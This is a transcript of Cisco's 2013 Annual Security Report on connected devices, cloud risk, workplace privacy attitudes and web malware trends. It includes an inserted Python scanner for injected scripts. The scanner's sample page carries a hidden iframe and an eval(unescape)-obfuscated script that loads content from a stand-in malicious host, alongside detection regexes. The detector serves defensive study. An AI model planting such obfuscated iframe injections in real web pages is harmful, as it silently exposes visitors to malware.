2013 Cisco Security Report (Raportul Cisco pe Securitate 2013)


Transcript of the 2013 Cisco Security Report (Raportul Cisco pe Securitate 2013)

  • 7/29/2019 Raportul Cisco pe Securitate 2013

    1/41


2013 Cisco Annual Security Report, page 2

Cybercriminals are taking advantage of the rapidly expanding attack surface found in today's any-to-any world, where individuals are using any device to access business applications in a network environment that utilizes decentralized cloud services. The 2013 Cisco Annual Security Report highlights global threat trends based on real-world data, and provides insight and analysis that helps businesses and governments improve their security posturing for the future. The report combines expert research with security intelligence that was aggregated from across Cisco, focusing on data collected during the 2012 calendar year.


2013 Cisco Annual Security Report, page 4

Contents

The Nexus of Devices, Clouds, and Applications ... 6
Endpoint Proliferation ... 12
Services Reside in Many Clouds ... 18
Blending of Business and Personal Use: Millennials and the Workplace ... 22
Big Data: A Big Deal for Today's Enterprises ... 28
State of the Exploit: Danger Lurks in Surprising Places ... 32
Evolutionary Threats: New Methods, Same Exploits ... 50
Spam the Ever Present ... 58
Security Outlook 2013 ... 70
About Cisco Security Intelligence Operations ... 74


2013 Cisco Annual Security Report, page 6

The Nexus of Devices, Clouds, and Applications

While this evolution is not unexpected, today's enterprises may be unprepared for the reality of navigating an any-to-any world, at least from a security perspective.

"The crux of the any-to-any issue is this: We're quickly reaching the point where it is increasingly less likely that a user is going to access a business through an enterprise network," says Chris Young, Senior Vice President of the Security and Government Group at Cisco. "More and more, it's about any device in any location coming over any instantiation of the network. Internet-enabled devices (smartphones, tablets, and more) are trying to connect to applications that could be running anywhere, including in a public SaaS cloud, in a private cloud, or in a hybrid cloud."

At the same time, another evolution is underway: a steady movement toward the formation of the Internet of Everything. This is the intelligent connection of:

People: Social networks, population centers, digital entities
Processes: Systems, business processes
Data: World Wide Web, information
Things: Physical world, devices and objects


2013 Cisco Annual Security Report, page 8

The Internet of Everything builds on an Internet of Things1 foundation by adding network intelligence that allows convergence, orchestration, and visibility across previously disparate systems. Connections in the Internet of Everything aren't just about mobile devices or laptops and desktops, but also the rapidly growing number of machine-to-machine (M2M) connections coming online each day. These "things" are often objects we take for granted or rely on each day, and don't traditionally think of as being connected, such as a home heating system, a wind turbine, or a car.

The Internet of Everything is a future state, to be sure, but is not so distant when the any-to-any issue is considered. And while it, too, will create security challenges for enterprises, it will bring new opportunities as well. "Amazing things will happen and be created as the Internet of Everything grows," says Nancy Cam-Winget, a distinguished engineer, Cisco. "The growth and convergence of people, processes, data, and things on the Internet will make networked connections more relevant and valuable than ever before. Ultimately, the Internet of Everything will create new capabilities, richer experiences, and unprecedented economic opportunities for countries, businesses, and individuals."

How the Cloud Complicates Security

The challenge of securing a wide range of applications, devices, and users, whether in an any-to-any or Internet of Everything context, is made tougher by the popularity of the cloud as a means of managing enterprise systems. According to data compiled by Cisco, global data center traffic is expected to quadruple over the next five years, and the fastest-growing component is cloud data. By 2016, global cloud traffic will make up nearly two-thirds of total data center traffic.

Piecemeal security solutions, such as applying firewalls to a changeable network edge, don't secure data that is now constantly in motion among devices, networks, and clouds. Even among data centers, which now house organizations' crown jewels (big data), virtualization is becoming more the rule than the exception. Addressing security challenges presented by virtualization and the cloud requires rethinking security postures to reflect this new paradigm: perimeter-based controls and old models of access and containment need to be changed to secure the new business model.

Connected Workers and Data Privacy

Another complicating factor in the any-to-any equation is young, mobile workers. This group believes they should be able to do business wherever they happen to be and on whatever devices they have at hand. Featured in this year's 2013 Cisco Annual Security Report are findings from the 2012 Cisco Connected World Technology Report, which build on research conducted in 2011 about the changing attitudes that college students and young professionals around the globe have toward work, technology, and security.

The latest study shines even more light on these workers' attitudes toward security, with a special focus on privacy and how much or how often a company can intrude on an employee's desire to freely roam the Internet while at work. The 2012 Cisco Connected World Technology Report study also examines whether online privacy is still something that all users actively worry about.

Data Analysis and Global Security Trends

The 2013 Cisco Annual Security Report includes in-depth analysis of web malware and spam trends, based on research conducted by Cisco.

While many who operate in the shadow economy have centered their efforts in recent years on developing increasingly sophisticated techniques, Cisco's research makes clear that cybercriminals are often turning to well-known and basic methods to compromise users.

The rise in distributed denial of service (DDoS) attacks over the past year is just one example of the trend toward "what's old is new again" in cybercrime. For several years, DDoS attacks, which can paralyze Internet service providers (ISPs) and disrupt traffic to and from targeted websites, have been low on the list of IT security priorities for many enterprises. However, recent campaigns against a number of high-profile companies, including U.S. financial institutions2, serve as a reminder that any cybersecurity threat has the potential to create significant disruption, and even irreparable damage, if an organization is not prepared for it. Therefore, when creating their business continuity management plans, enterprises would be wise to consider how they would respond to and recover from a disruptive cyber event, whether that event takes the form of a DDoS attack directed at the company; a critical, Internet-enabled manufacturing facility suddenly going offline; an advanced multistage attack by the criminal underground; or something else never before seen.

"While the IT security discussion has suffered more than its fair share of alarmism over the years, we are seeing some disturbing changes in the threat environment facing governments, companies, and societies," says John N. Stewart, Senior Vice President and Chief Security Officer at Cisco. "Cybercrime is no longer an annoyance or another cost of doing business. We are approaching a tipping point where the economic losses generated by cybercrime are threatening to overwhelm the economic benefits created by information technology. Clearly, we need new thinking and approaches to reducing the damage that cybercrime inflicts on the well-being of the world."


2013 Cisco Annual Security Report, page 12

Endpoint Proliferation

Considering that less than 1 percent of things in the physical world are connected today, there remains vast potential to connect the unconnected.4 It is projected that with an Internet that already has an estimated 50 billion things connected to it, the number of connections will increase to 13,311,666,640,184,600 by the year 2020. Adding just one more Internet-connected thing (50 billion + 1) will increase the number of connections by another 50 billion.5

As for the things that will eventually comprise the "everything," they will range from smartphones to home heating systems to wind turbines to cars. Dave Evans, Cisco's Chief Futurist with the Internet Business Solutions Group, explains the concept of endpoint proliferation like this: "When your car becomes connected to the Internet of Everything in the near future, it will simply increase the number of things on the Internet by one. Now, think about the numerous other elements to which your car could be connected: other cars, stoplights, your home, service personnel, weather reports, warning signs, and even the road itself."6


2013 Cisco Annual Security Report, page 14

Figure 1: The Internet of Everything. The Internet of Everything is the intelligent connection of people, processes, data, and things. (Diagram labels: People, Data, Process, Things; connection types People to Machine (P2M), People to People (P2P), Machine to Machine (M2M); environments Business, Home, Mobile.)

In the Internet of Everything, connections are what matter most. The types of connections, not the number, are what create value between people, processes, data, and things. And eventually, the number of connections will dwarf the number of things.7 The explosion of new connections already becoming part of the Internet of Everything is driven primarily by the development of more and more IP-enabled devices, but also by the increase in global broadband availability and the advent of IPv6. The security risks posed by the Internet of Everything are not just related to the any-to-any endpoint proliferation that is bringing us closer, day by day, to an even more highly connected world, but also the opportunity for malicious actors to utilize even more inroads to compromise users, networks, and data. The new connections themselves create risk because they will generate even more data in motion that needs to be protected in real time, including the ballooning volumes of big data that enterprises will continue to collect, store, and analyze.

"The Internet of Everything is quickly taking shape, so the security professional needs to think about how to shift their focus from simply securing endpoints and the network perimeter," says Chris Young. "There will be too many devices, too many connections, and too many content types and applications, and the number will only keep growing. In this new landscape, the network itself becomes part of the security paradigm that allows enterprises to extend policy and control over different environments."


2013 Cisco Annual Security Report, page 16

Cisco BYOD Update

Endpoint proliferation is a phenomenon Cisco knows well within its own organization of 70,000 employees worldwide. Since formalizing its BYOD practice two years ago, the company has witnessed a 79 percent growth rate in the number of mobile devices in use in the organization.

The Cisco 2011 Annual Security Report8 first examined Cisco's unfolding BYOD journey, which is part of the organization's ongoing and broader transition toward becoming a virtual enterprise. By the time Cisco reaches the last stage of its planned journey, which will take several years, the company will be increasingly location- and service-independent, and enterprise data still will be secure.9

In 2012, Cisco added about 11,000 smartphones and tablet computers companywide, or about 1,000 new Internet-enabled devices per month. "At the end of 2012, there were nearly 60,000 smartphones and tablets in use in the organization, including just under 14,000 iPads, and all of them were Bring Your Own (BYO)," says Brett Belding, Senior Manager Overseeing Cisco IT Mobility Services. "Mobile at Cisco is now BYO, period."

The device type that's seen the biggest increase in use at Cisco is the Apple iPad. "It's fascinating to think that three years ago, this product didn't even exist," says Belding. "Now, there are more than 14,000 iPads being used at Cisco every day by our employees for a variety of activities, both personal- and work-related. And employees are using iPads in addition to their smartphones."

As for smartphones, the number of Apple iPhones in use at Cisco has almost tripled in two years' time to nearly 28,600. RIM BlackBerry, Google Android, and Microsoft Windows devices are also included in the BYOD program at Cisco. Employees make the choice to trade having access to corporate data on their personal device with agreement on security controls. For example, if you want to check your email and calendar on your device, you have to take Cisco's security profile that enforces remote wipe, encryption, and passphrase.

Social support has been a key component of the BYOD program at Cisco from the start. "We rely heavily on [the enterprise collaboration platform] WebEx Social as our BYOD support platform, and it's paid huge dividends," says Belding. "We have more devices supported than ever before and, at the same time, we've had the fewest number of support cases. Our goal is that someday an employee can simply bring in any device and self-provision using the Cisco Identity Services Engine (ISE) and set up our core WebEx collaboration tools, including Meeting Center, Jabber, and WebEx Social."

The next step for BYOD at Cisco, according to Belding, is to further improve security by increasing visibility and control over all user activity and devices, on both the physical network and virtual infrastructure, while improving the user experience. "Caring about the user experience is a core consumerization of IT trend," says Belding. "We're trying to apply this concept to our organization. We have to. I think what we're seeing now is an IT-ization of users. We're beyond the point of them asking, 'Can I use this device at work?' Now they're saying, 'I understand you need to keep the enterprise secure, but don't interfere with my user experience.'"

Figure 2: Mobile devices in use at Cisco, by platform. Chart columns: Platform; Dec 2010; Dec 2011; Dec 2012. Rows: iPhone, iPad, BlackBerry, Android, Other, Total.


2013 Cisco Annual Security Report, page 18

Services Reside in Many Clouds

Of this tremendous growth, the fastest-growing component is cloud data. Global cloud traffic will increase six-fold over the next five years, growing at a rate of 44 percent from 2011 to 2016. In fact, global cloud traffic will make up nearly two-thirds of total data center traffic by 2016.11

This explosion in cloud traffic raises questions about the ability of enterprises to manage this information. In the cloud, the lines of control are blurred: Can an organization place safety nets around its cloud data when they don't own and operate the data center? How can even basic security tools such as firewalls and antivirus software be applied when the network edge cannot be defined?

No matter how many security questions are raised, it's clear more and more enterprises are embracing the benefits of clouds, and those that have are not likely to return to the private data center model. While the opportunities of the cloud for organizations are many, including cost savings, greater workforce collaboration, productivity, and a reduced carbon footprint, the possible security risks that enterprises face as a result of moving business data and processes to the cloud:

Hypervisors

If compromised, this software that creates and runs virtual machines could lead to mass hacking or data compromise against multiple servers, applying the same ease of management and access that virtualization provides to a successful hack. A rogue hypervisor (taken control of by "hyperjacking") can take complete control of a server.12

Lowered cost of entry

Virtualization has lowered the cost of entry to provide services like a virtual private server (VPS). Compared to older hardware-based data center models, we are seeing a growth in quick, cheap, and easily available infrastructure for criminal activities. For instance, there are many VPS services available for instant sale (with the ability to purchase using Bitcoin or other hard-to-trace payment types) that are targeted to the criminal underground. Virtualization has made infrastructure much cheaper and easier to provide, with little to no policing of activities.

Decoupling of virtualized applications

Because virtualized applications are decoupled from the physical resources they use, it becomes more difficult for enterprises to apply traditional security approaches. IT providers seek to minimize cost with a very elastic offering in which they can move resources as needed, contrasted with the security group seeking to collocate services of like security posture and keep them apart from others that may be less secure.

"Virtualization and cloud computing create problems just like those of BYOD, but turned on their head," says Joe Epstein, former Chief Executive Officer of Virtuata, a company acquired by Cisco in 2012 that provides innovative capabilities for securing virtual machine-level information in data centers and cloud environments. "High-value applications and high-value data are now moving around the data center. And the notion of virtual workloads makes enterprises uncomfortable. In the virtual environment, how do you know you can trust what you're running? The answer is that you haven't been able to so far, and that uncertainty has been a key barrier to cloud adoption."

But Epstein notes that it is becoming increasingly difficult for enterprises to ignore virtualization and the cloud. "The world is going to share everything," he says. "Everything will be virtualized; everything will be shared. It will not make sense to continue running only private data centers; hybrid clouds are where IT is heading."

The answer to these growing cloud and virtualization challenges is adaptive and responsive security. In this case, security must be a programmable element seamlessly integrated into the underlying data center fabric, according to Epstein. In addition, security needs to be built in at the design phase, instead of being bolted on post-implementation.


2013 Cisco Annual Security Report, page 22

Blending of Business and Personal Use: Millennials and the Workplace

According to the 2012 Cisco Connected World Technology Report study, two-thirds of respondents believe employers should not track employees' online activities on company-issued devices. In short, they do not think employers have any business monitoring such behavior. Only about one-third (34 percent) of workers surveyed say they don't mind if employers track their online behavior.

Only one in five respondents say their employers do track their online activities on company-owned devices, while 46 percent say their employers do not track activity. Findings for the latest Connected World study also show that Millennials have strong feelings about employers tracking the online activity of workers, even those who report they work at organizations where such tracking does not occur.


2013 Cisco Annual Security Report, page 24

Compounding the challenges for security professionals, there appears to be a disconnect between what employees think they can do with their company-issued devices and what policies IT actually dictates about personal usage. Four out of 10 respondents say they are supposed to use company-issued devices for work activity only, while a quarter say they are allowed to use company devices for non-work activity. However, 90 percent of IT professionals surveyed say they do indeed have policies that prohibit company-issued devices being used for personal online activity, although 38 percent acknowledge that employees break policy and use devices for personal activities in addition to doing work. You can find information about Cisco's approach to these BYOD challenges on page 16.

Privacy and Millennials

According to the 2012 Cisco Connected World Technology Report, Millennials have accepted the fact that, thanks to the Internet, personal privacy may be a thing of the past. 91 percent of young consumers surveyed say that the age of privacy is over and believe they can't control the privacy of their information, with one third of respondents reporting they are not worried about the data that is stored and captured about them.

In general, Millennials also believe their online identity is different from their offline identity. 45 percent say these identities are often different depending on the activity in question, while 36 percent believe these identities are completely different. Only 8 percent believe these identities are the same.

Young consumers also have high expectations that websites will keep their information private, often feeling more comfortable sharing data with large social media or community sites given the cloak of anonymity the crowd provides. Forty-six percent say they expect certain websites to keep their information secure, while 17 percent say they trust most websites to keep their information private. However, 29 percent say that not only do they not trust websites to keep their information private; they are very concerned about security and identity theft. Compare this to the idea of sharing data with an employer who has the context about who they are and what they do.

"Millennials are now entering the workplace and bringing with them new working practices and attitudes to information and the associated security thereof. They believe in the demise of privacy, that it's simply defunct in practice, and it's in this paradigm that organizations must operate, a concept that will be alarming to the older generation in the workplace," says Adam Philpott, Director, EMEAR Security Sales, Cisco. "Organizations can, however, look to provide information security education to their employees to alert them to the risks and provide guidance on how best to share information and leverage online tools within the realms of data security."


2013 Cisco Annual Security Report, page 26

Why Enterprises Need to Raise Awareness of Social Media Disinformation

by Jean Gordon Kocienda, Global Threat Analyst, Cisco

Social media has been a boon for many enterprises; the ability to connect directly with customers and other audiences via Twitter and Facebook has helped many organizations build brand awareness via online social interaction.

The flip side of this lightning-fast direct communication is that social media can allow inaccurate or misleading information to spread like wildfire. It isn't hard to imagine a scenario in which a terrorist coordinates on-the-ground attacks by using misleading tweets with the intent to clog roads or phone lines, or to send people into the path of danger. One example: India's government blocked hundreds of websites and curbed texts13 this summer in an attempt to restore calm in the north-eastern part of the country after photographs and text messages were posted. The rumors prompted thousands of panicked migrant workers to flood train and bus stations.

Similar social media disinformation campaigns have affected market prices as well. A hijacked Reuters Twitter feed reported that the Free Syrian Army had collapsed in Aleppo. A few days later, a Twitter feed was compromised, and a purported top Russian diplomat tweeted that Syrian President Bashar Al-Assad was dead. Before these accounts could be discredited, oil prices on international markets spiked.14

Security professionals need to be alert to such fast-moving and potentially damaging social media posts, especially if they are directed at the enterprise itself, and quick action is needed to defend networks from malware, alert employees to a bogus phishing attempt, re-route a shipment, or advise employees regarding safety. The last thing security executives want to do is alert managers to a breaking story that turns out to be a hoax.

The first safeguard against falling for fabricated stories is to confirm the story across multiple sources. At one time, journalists did this job for us, so that by the time we read or heard the news, it was vetted. These days, many journalists are getting their stories from the same Twitter feeds that we are, and if several of us fall for the same story, we can easily mistake re-tweets for story confirmation.

For fast-breaking news requiring quick action, your best bet may be to use the old-fashioned sniff test. If the story seems far-fetched, think twice before repeating or citing it.15


2013 Cisco Annual Security Report, page 28

Big Data: A Big Deal for Today's Enterprises

The 2012 Cisco Connected World Technology Report examined the impact of the big-data trend on enterprises, and more specifically, their IT teams. According to the study's findings, about three-quarters (74 percent) of organizations globally are already collecting and storing data, and management is using analysis of big data to make business decisions. Additionally, seven in 10 IT respondents reported that big data will be a strategic priority for their company and IT team in the year ahead.

As mobility, cloud, virtualization, endpoint proliferation, and other networking trends evolve or emerge, they will pave the way for even more big data and analytics opportunities for businesses. But there are security concerns about big data. The 2012 Connected World study's findings show that a third of respondents (32 percent) believe big data complicates security requirements and protection of data and networks because there is so much data and too many ways of accessing it. In short, big data increases the vectors and angles that enterprise security teams (and security solutions) must cover.

    About 74 percent o organizationsglobally are already collecting andstoring data, and management

    is using analysis o big data tomake business decisions.

  • 7/29/2019 Raportul Cisco pe Securitate 2013

    16/41

    2013 Cisco Annual Security Report30

Korea (45 percent), Germany (42 percent), the United States (40 percent), and Mexico (40 percent) had the highest percentages of IT respondents who believe big data complicates security. To help ensure security, the majority of IT respondents, more than two-thirds (68 percent), believe the entire IT team should participate in strategizing and leading big data efforts within their companies. Gavin Reid, Director of Threat Research for Cisco Security Intelligence Operations, says: "Big data doesn't complicate security, it makes it possible. At Cisco we collect and store 2.6 trillion records every day; that forms the platform from which we can start incident detection and control."

As for solutions designed to help enterprises both better manage and unlock the value of their big data, there are barriers to adoption. Respondents pointed to lack of budget, lack of time to study big data, lack of appropriate solutions, lack of IT staff, and lack of IT expertise. The fact that almost one in four respondents globally (23 percent) said lack of expertise and personnel was an inhibitor to their enterprise's ability to use big data effectively indicates a need for more professionals entering the job market to be trained in this area.

The cloud is a factor in big data success as well, according to 50 percent of IT respondents to the 2012 Connected World study. They believe their organizations need to work through cloud plans and deployments to make big data a worthwhile venture. This sentiment was prominent in China (78 percent) and India (76 percent), where more than three out of four respondents believed there was a dependency on cloud before big data could truly take off. As a result, in some cases, the study indicates cloud adoption will impact the rate of adoption, and the benefits, of big-data efforts.

More than half of overall IT respondents also confirmed that big-data discussions within their companies are not fruitful yet. That is not surprising considering the market is just now trying to understand how to harness its big data, analyze it, and use it strategically. In some countries, however, big-data discussions are resulting in meaningful decisions on strategy, direction, and solutions. China (82 percent), Mexico (67 percent), India (63 percent), and Argentina (57 percent) lead in this regard, with well over half of the respondents from these countries claiming that big-data discussions in their organizations are well underway and leading to solid actions and results.

Three out of five IT respondents to the 2012 Connected World Report believe big data can help countries and their economies become more competitive in the global marketplace.

State of the Exploit: Danger Lurks in Surprising Places

The general belief is that sites that promote criminal activity, such as sites selling illegal pharmaceuticals or counterfeit luxury goods, are most likely to host malware. Our data shows this notion to be outdated: web malware encounters are typically not the by-product of "bad" sites in today's threat landscape.

"Web malware encounters occur everywhere people visit on the Internet, including the most legitimate of websites that they visit frequently, even for business purposes," says Mary Landesman, Senior Security Researcher with Cisco. Indeed, business and industry sites are one of the top three categories visited when a malware encounter occurred.

Of course, this isn't the result of business sites that are designed to be malicious. The dangers, however, are often hidden in plain sight through exploit-laden online ads that are distributed to legitimate websites, or hackers targeting the user community on the common sites they use most. In addition, malware-infected websites are prevalent across many countries and regions, not just in one or two countries, dispelling the notion that some countries' websites are more likely to host malicious content than others. "The web is the most formidable malware delivery mechanism we've seen to date, outpacing even the most prolific worm or virus in its ability to reach and infect a mass audience silently and effectively," says Landesman. Enterprises need protection, even if they block common bad sites, with additional granularity in inspection and analysis.

Malware Encounters by Company Size

The largest enterprises (25,000+ employees) have more than 2.5 times the risk of encountering web malware than smaller companies. This increased risk may be a reflection that larger companies possess more high-value intellectual property and thus are more frequently targeted. While smaller companies have fewer web malware encounters per user, it's important to note that all companies, regardless of size, face significant risk of web malware encounters. Every organization should focus on the fundamentals of securing its network and intellectual property.

Malware Encounters by Country

Cisco's research shows significant change in the global landscape for web malware encounters by country in 2012. China, which was second on the list in 2011 for web malware encounters, fell dramatically to sixth position in 2012. Denmark and Sweden now hold the third and fourth spots, respectively. The United States retains the top ranking in 2012, as it did in 2011, with 33 percent of all web malware encounters occurring via websites hosted in the United States.

Changes in geographical location between 2011 and 2012 likely reflect both changes in detection and user habits. For example, malvertising, or malware delivered via online ads, played a more significant role in web malware encounters in 2012 than in 2011. It is worth repeating that web malware encounters most frequently occur via normal browsing of legitimate websites that may have been compromised or are unwittingly serving malicious advertising. Malicious advertising can impact any website, regardless of the site's origin. Overall, the geographical data for 2012 demonstrates that the web is an equal-opportunity infector, contrary to the perceptions that only one or two countries are responsible for hosting web malware or that any one country is safer than another. Just as the dynamic content delivery of Web 2.0 enables the monetization of websites across the globe, it can also facilitate the global delivery of web malware.

Figure 3: Risk by Company Size. Up to 2.5 times more risk of encountering web malware for large organizations. (Bar chart by number of employees: 250 or less; 251-500; 501-1,000; 1,001-2,500; 2,501-5,000; 5,001-10,000; 10,001-25,000; above 25,000. The bar values are not recoverable from the transcript.)

Figure 4: Web Malware Encounters by Country. One-third of all web malware encounters resulted from domains hosted in the United States. (Map of the top 10 hosting countries with "gain from 2011" / "decline from 2011" markers; the markers are not recoverable from the transcript.)

   1. United States    33.14%
   2. Russia            9.79%
   3. Denmark           9.55%
   4. Sweden            9.27%
   5. (see note)        6.11%
   6. China             5.65%
   7. United Kingdom    4.07%
   8. Turkey            2.63%
   9. (see note)        2.27%
  10. (see note)        1.95%

Note: Germany, the Netherlands, and Ireland are the remaining three countries on the map; the transcript does not preserve which of 6.11%, 2.27%, and 1.95% belongs to each.

Of course, there is a distinct difference between where a web malware encounter occurs and where the malware is actually hosted. In malvertising, for example, the encounter typically occurs when visiting a reputable, legitimate website that happens to carry third-party advertising. However, the actual malware intended for delivery is hosted on a completely different domain. Since our data is based on where the encounter occurred, it has no bearing on actual malware origin. For instance, increased popularity of social media and entertainment sites in Denmark and Sweden, coupled with malvertising risks, is largely responsible for increased encounters from sites hosted in those regions but is not indicative of actual malware origin.
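The distinction above, between the page on which an encounter is logged and the domain that actually served the payload, is easy to lose in reporting. The following script is an added example, not Cisco's tooling or data: it reads constructed web-proxy log lines (the line format, the domains, and the TLD-to-country table are assumptions standing in for a real proxy log and a geolocation feed) and tallies blocked malware events twice, once by the country of the page the user was on and once by the country of the host that served the blocked object.

```python
"""Attribute blocked web-malware encounters to the page visited versus the
host that actually served the payload.  Added example: the log format, the
domains and the country table are constructed, not Cisco data."""
from collections import Counter
from urllib.parse import urlsplit

# Constructed proxy log: timestamp, client IP, action, requested URL, referer ("-" if none).
SAMPLE_LOG = """\
2012-11-03T10:14:02Z 10.1.4.22 BLOCK-MALWARE http://cdn-ads.example-adnet.ru/serve/x.js http://news.example.dk/front
2012-11-03T10:14:05Z 10.1.4.22 BLOCK-MALWARE http://cdn-ads.example-adnet.ru/serve/x.js http://video.example.se/watch?v=1
2012-11-03T10:15:40Z 10.1.4.31 BLOCK-MALWARE http://static.example-host.com/jquery.min.js http://shop.example.com/cart
2012-11-03T10:16:01Z 10.1.4.31 ALLOW http://shop.example.com/cart -
2012-11-03T10:17:12Z 10.1.4.40 BLOCK-MALWARE http://cdn-ads.example-adnet.ru/serve/x.js http://forum.example.dk/t/42
"""

# Constructed TLD-to-country table standing in for a real geolocation lookup (assumption).
TLD_COUNTRY = {"dk": "Denmark", "se": "Sweden", "ru": "Russia", "com": "United States"}


def country_of(host: str) -> str:
    """Map a hostname to a country by its top-level label."""
    return TLD_COUNTRY.get(host.rsplit(".", 1)[-1], "unknown")


def parse_log(text: str):
    """Yield one dict per non-empty log line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, action, url, referer = line.split(maxsplit=4)
        yield {"ts": ts, "client": client, "action": action, "url": url, "referer": referer}


def attribute_encounters(text: str):
    """Return (by_encounter_site, by_payload_host): country tallies for blocked events."""
    by_site, by_host = Counter(), Counter()
    for ev in parse_log(text):
        if ev["action"] != "BLOCK-MALWARE":
            continue
        payload_host = urlsplit(ev["url"]).hostname
        # The encounter happened on the page the user was viewing (the referer);
        # with no referer, the only site we know about is the payload host itself.
        site_host = urlsplit(ev["referer"]).hostname if ev["referer"] != "-" else payload_host
        by_site[country_of(site_host)] += 1
        by_host[country_of(payload_host)] += 1
    return by_site, by_host


if __name__ == "__main__":
    site, host = attribute_encounters(SAMPLE_LOG)
    print("encounters by page visited :", dict(site))
    print("encounters by payload host :", dict(host))
```

Run as written, the same four blocked events attribute mostly to Denmark and Sweden by page visited but to Russia and the United States by payload host; a per-country statistic is only meaningful once it says which of the two it counts.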

Top Web Malware Types in 2012

Android malware grew substantially faster than any other form of web-delivered malware, an important trend given that Android is reported to hold the majority of mobile device market share worldwide. It is important to note that mobile malware encounters comprised only 0.5 percent of all web malware encounters in 2012, with Android accounting for over 95 percent of those mobile encounters. In addition, 2012 saw the emergence of the first documented Android botnet in the wild, indicating that mobile malware developments in 2013 bear watching.

While some experts are claiming Android is the biggest threat or should be a primary focus for enterprise security teams in 2013, the actual data shows otherwise. As noted above, mobile web malware in general makes up less than 1 percent of total encounters, far from the doomsday scenario many are detailing. The impact of BYOD and the proliferation of devices cannot be overstated, but organizations should be more concerned with threats such as accidental data loss, and with ensuring that employees do not root or jailbreak their devices and install applications only from official and trusted distribution channels. If users choose to go outside official mobile app stores, they should ensure, before downloading an app, that they know and trust the app's author and can validate that the code has not been tampered with.

Looking at the wider landscape for web malware, it is not surprising that malicious scripts and iFrames comprised 83 percent of encounters in 2012. While this is relatively consistent with previous years, it's a finding worthy of reflection. These types of attacks often represent malicious code on trusted webpages that users may visit every day, meaning an attacker is able to compromise users without even raising their suspicion.

Figure 5: Top Web Malware Types. Android malware encounters grew 2,577 percent over 2012, though mobile malware only makes up a small percentage of total web malware encounters.

  Malscript/Iframe      83.4%
  Exploit                9.8%
  Infostealing           3.4%
  Downloader             1.1%
  Worm                   0.89%
  Virus                  0.48%
  Mobile                 0.42%
  Scareware              0.16%
  Ransomware             0.058%
  Malware / Hack Kit     0.057%

  Android growth, Jan to Dec 2012 (monthly chart): 2,577%
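Because most of those 83 percent are blocks of injected script or iframe markup on otherwise legitimate pages, a practitioner wants to spot that markup directly. The scanner below is an added example, not Cisco's detection logic: it runs over a constructed HTML page and flags iframes hidden by size or style, and script blocks that combine an eval/unescape primitive with a body made mostly of escaped bytes, decoding the escapes to reveal the iframe they inject. The page content, the thresholds, and the regular expressions are assumptions chosen for illustration.

```python
"""Flag injected hidden iframes and obfuscated scripts in page HTML.
Added example with constructed input; heuristics are assumptions, not Cisco's."""
import re
from html.parser import HTMLParser

# Constructed page: a legitimate-looking store with an injected block appended.
SAMPLE_HTML = """<html><body>
<h1>Welcome to our store</h1>
<iframe src="https://player.example.com/embed/123" width="640" height="360"></iframe>
<script src="/static/app.js"></script>
<iframe src="http://x1.example-bad.net/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>eval(unescape("%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%78%31%2e%65%78%61%6d%70%6c%65%2d%62%61%64%2e%6e%65%74%2f%27%3e%22%29"));</script>
</body></html>"""

# Assumed heuristics: CSS that hides an element, JS primitives used to unpack droppers,
# and the two escape forms droppers are usually shipped in.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|left\s*:\s*-\d{3,}", re.I)
OBFUSCATION = re.compile(r"\beval\s*\(|\bunescape\s*\(|String\.fromCharCode", re.I)
ESCAPED = re.compile(r"%[0-9a-f]{2}|\\x[0-9a-f]{2}", re.I)
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc=['\"]([^'\"]+)", re.I)


def escape_density(s: str) -> float:
    """Fraction of the text consumed by %XX / \\xXX escapes."""
    return sum(len(m) for m in ESCAPED.findall(s)) / len(s) if s else 0.0


def decode_escapes(s: str) -> str:
    """Replace every %XX / \\xXX escape with the byte it encodes."""
    return ESCAPED.sub(lambda m: chr(int(m.group(0)[-2:], 16)), s)


class MalscriptScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []          # list of (kind, detail)
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            w = (a.get("width") or "").strip()
            h = (a.get("height") or "").strip()
            tiny = w.isdigit() and h.isdigit() and int(w) * int(h) <= 4
            hidden = bool(HIDDEN_STYLE.search(a.get("style") or ""))
            if tiny or hidden:
                self.findings.append(("hidden-iframe", a.get("src") or ""))
        elif tag == "script":
            self._in_script = True
            self._script_buf = []

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag != "script":
            return
        self._in_script = False
        body = "".join(self._script_buf)
        # An unpacking primitive applied to a body that is mostly escaped bytes (threshold assumed).
        if OBFUSCATION.search(body) and escape_density(body) > 0.5:
            decoded = decode_escapes(body)
            self.findings.append(("obfuscated-script", decoded))
            for src in IFRAME_SRC.findall(decoded):
                self.findings.append(("injected-iframe-src", src))


def scan_html(html: str):
    """Return the findings for one page."""
    scanner = MalscriptScanner()
    scanner.feed(html)
    return scanner.findings


if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML):
        print(f"{kind:22s} {detail[:80]}")
```

The decoded payload is reported rather than just the fact of obfuscation, because the injected iframe's destination is what a responder needs for blocking and for correlating with other pages carrying the same script.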

Exploits take the second spot, with 10 percent of the total number of web malware encounters last year. However, these figures are largely a result of where the block occurred versus the actual concentration of exploits on the web. For example, the 83 percent of malicious scripts and hidden iFrames are blocks that occur at an earlier stage, prior to any exploit rendering; hence, they may artificially decrease the number of exploits observed.

Exploits remain a significant cause of infection via the web, and their continued presence underscores the need for vendors to adopt security best practices in their product lifecycles. Organizations should focus on security as part of the product design and development process, with timely vulnerability disclosures and prompt, regular patch cycles. Organizations and users also need to be made aware of the security risks associated with using products that are no longer supported by vendors. It is also critical for organizations to maintain a core vulnerability management process and for users to keep their hardware and software up to date.

Rounding out the top five are infostealers, with 3.5 percent of the total web malware encounters in 2012, downloaders (1.1 percent), and worms (0.8 percent). Once again, these numbers are a reflection of where the block occurs, generally at the point at which the malicious script or iFrame is first encountered. As a result, these numbers are not reflective of the actual number of infostealers, downloaders, or worms being distributed via the web.

Top Malware Content Types

